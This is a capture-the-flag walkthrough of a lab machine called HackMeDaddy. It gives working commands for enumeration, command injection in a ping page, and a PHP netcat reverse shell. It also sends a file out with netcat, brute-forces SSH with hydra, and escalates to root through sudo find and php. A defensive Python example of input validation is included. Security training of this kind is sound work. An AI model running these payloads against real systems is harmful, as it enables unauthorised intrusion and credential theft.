
HackMeDaddy

export TARGET_IP=172.17.0.2
sudo nmap -p0- $TARGET_IP
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

Service Enumeration

  • The website's HTML source code reveals the hostname: hackmedaddy.com. This is added to the /etc/hosts file.

    echo "$TARGET_IP   hackmedaddy.com" | sudo tee -a /etc/hosts
  • Directory and file enumeration is performed using gobuster:

    gobuster dir -u http://$TARGET_IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak

    This identifies the following interesting files:

    /info.txt
    /flag.txt
  • Further investigation of robots.txt reveals disallowed entries:

    curl http://hackmedaddy.com/robots.txt
    User-agent: *
    Disallow: /FLAG.txt
    Disallow: /joomla/*
    Disallow: /secret/
  • info.txt contains a message hinting at a removed file named README.txt in the HTML folder:

    Look, I told Eliot to remove those words from the README.txt because it could be a big security flaw in our HTML folder.
  • The main page's source code contains a cat README.txt command and its output:

    d05notfound exploit payload shell bruteforce vulnerability cipher zero-day phishing root port_scan firewall backdoor

    This reads like a small custom wordlist rather than a list of attack ideas: each entry is a candidate path name to try against the web root, which is what the info.txt hint about "those words" in the HTML folder points at.

  • Based on the first entry d05notfound in the list, we access http://hackmedaddy.com/d05notfound and find a PHP page at http://hackmedaddy.com/d05notfound/d05notfound.php.

  • The page pings a user-supplied IP address. The input form is not rendered visibly and is only found by viewing the page source. User input handed to a system ping command is a classic command injection candidate.

Exploitation: Command Injection

  • Confirmation

    The ping functionality is vulnerable to command injection. Submitting 192.168.1.100 | ls -al in the input field and viewing the page source reveals the output of ls -al, confirming the vulnerability. The pipe works because the page's ping output is fed to ls, which ignores its standard input, so only the directory listing is returned; the output lands in the source rather than the rendered page, just like the form itself.

  • Reverse Shell

    A reverse shell is established using netcat on the attacking machine and a PHP reverse shell one-liner on the target:

    Attacker machine:

    nc -lvnp 4444

    Target machine (injected command):

    192.168.1.100 | php -r '$sock=fsockopen("172.17.0.1",4444);exec("sh <&3 >&3 2>&3");'

    This grants a shell as the www-data user.
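The injection works because the page splices the submitted address into a shell command line. The following is an added illustration written for this writeup, not the lab's own PHP code: it shows the vulnerable pattern in Python beside a hardened version that validates the address with the ipaddress module and passes it as a separate argv element with no shell involved. echo stands in for ping so the demonstration runs offline without raw-socket privileges, and the payload string is constructed for the example in the style of the one used against the lab page.

```python
import ipaddress
import subprocess


def run_ping_unsafe(target: str, binary: str = "ping") -> str:
    """Vulnerable pattern: user input is spliced into a shell command string.

    Any shell metacharacter in `target` ("|", ";", "$(...)") therefore runs
    attacker-chosen commands, which is what the d05notfound ping page allows.
    """
    cmd = f"{binary} -c 1 {target}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def validate_ip(target: str) -> str:
    """Accept only a syntactically valid IPv4/IPv6 address; reject anything else."""
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"not an IP address: {target!r}") from None


def run_ping_safe(target: str, binary: str = "ping") -> str:
    """Hardened pattern: validate first, then pass argv as a list so no shell parses it."""
    ip = validate_ip(target)
    proc = subprocess.run([binary, "-c", "1", ip], shell=False,
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # Constructed payload (assumption for the demo): a pipe appended to a valid address.
    payload = "192.168.1.100 | echo INJECTED"
    # With echo standing in for ping, the unsafe version executes the injected command.
    print(run_ping_unsafe(payload, binary="echo"), end="")
    # The safe version refuses the payload before any process is started.
    try:
        run_ping_safe(payload, binary="echo")
    except ValueError as exc:
        print("rejected:", exc)
```

The PHP equivalent of the hardened branch is to check the input with filter_var($ip, FILTER_VALIDATE_IP) and, if the value still has to reach a shell, wrap it in escapeshellarg(); validation alone would have closed the hole in the lab page.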

Privilege Escalation: User e1i0t

Information Gathering

  • nota.txt in e1i0t's home directory suggests that passwords have been removed from an "agenda":

    Reminder:

    Delete my passwords from the agenda, I don't want to screw up with the boss again.

    By e1i0t
  • agenda.txt and agenda_passwords.txt are found in e1i0t's documents directory. These likely contain usernames and potential passwords.

Password Cracking

  • agenda.txt is transferred to the attacker's machine using netcat:

    Attacker machine:

    nc -lvnp 4444 > agenda.txt

    Target machine (from the www-data shell, sending the file to the attacker's address used for the reverse shell):

    cat /home/e1i0t/documents/agenda.txt | nc 172.17.0.1 4444
  • hydra is used to brute-force e1i0t's SSH password using agenda.txt as the wordlist:

    hydra -l e1i0t -P agenda.txt ssh://$TARGET_IP

    This successfully identifies the password as eliotelmejor.

User e1i0t Access

The attacker logs in as e1i0t via SSH:

ssh e1i0t@$TARGET_IP # Password: eliotelmejor

Privilege Escalation: User an0n1mat0

Privilege Enumeration

sudo -l reveals that e1i0t can run /bin/find as user an0n1mat0 without a password:

User e1i0t may run the following commands on 8cc0abdb7353:
(an0n1mat0 : an0n1mat0) NOPASSWD: /bin/find

Exploitation

A shell as an0n1mat0 is obtained using find's -exec option:

sudo -u an0n1mat0 find . -exec /bin/sh \; -quit

Privilege Escalation: Attempting Root

Further Enumeration

  • sudo -l as an0n1mat0 indicates that a password is required for further privilege escalation.

  • nota.txt in an0n1mat0's home directory mentions a "secret folder":

    The boss told me that he will soon remove your privileges to be able to access your secret folder.
  • A directory named /secret is found (find / -name 'secret' 2>/dev/null); it matches the Disallow: /secret/ entry seen earlier in robots.txt. confidencial.txt inside it mentions a file called passwords_users.txt in a secure location.

  • passwords_users.txt is found at /usr/local/bin/passwords_users.txt (find / -name 'passwords_users.txt' 2>/dev/null). It contains:

    User passwords:

    e1i0t:eliotelmejor
    an0n1mat0:XXyanonymous
    root:root

    There are some outdated passwords, but I don't remember an0n1mat0's entire password, I know that where the two

Password Generation

The next step is to generate candidate passwords for an0n1mat0 from XXyanonymous, treating XX as two unknown characters. A Python script is used for this:

password_generation.py
import itertools
import string

# From passwords_users.txt: the password is "XXyanonymous" with the two
# leading characters unknown, so every two-character prefix is enumerated.
base_password = "yanonymous"
prefix = "XX"  # placeholder for the unknown characters; only its length is used

# Generate all possible two-character combinations of lowercase letters and digits
# (36^2 = 1296 candidates)
alphabet = string.ascii_lowercase + string.digits
combinations = [''.join(comb) for comb in itertools.product(alphabet, repeat=len(prefix))]

# Create a file with the generated passwords, one per line, for hydra
with open("an0n1mat0_passwords.txt", "w") as f:
    for combination in combinations:
        f.write(f"{combination}{base_password}\n")

print("Password list generated: an0n1mat0_passwords.txt")

This creates a file named an0n1mat0_passwords.txt.

Brute-Forcing an0n1mat0's password

hydra -l an0n1mat0 -P an0n1mat0_passwords.txt ssh://$TARGET_IP
[22][ssh] host: 172.17.0.2   login: an0n1mat0   password: soyanonymous

User an0n1mat0 Access

ssh an0n1mat0@$TARGET_IP # Password: soyanonymous
sudo -l
Matching Defaults entries for an0n1mat0 on 8cc0abdb7353:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User an0n1mat0 may run the following commands on 8cc0abdb7353:
(ALL : ALL) /bin/php

Exploitation

See the php entry on GTFOBins: with sudo allowing /bin/php as any user, a one-liner spawns a root shell.

sudo php -r 'system("/bin/sh");'
id # uid=0(root) gid=0(root) groups=0(root)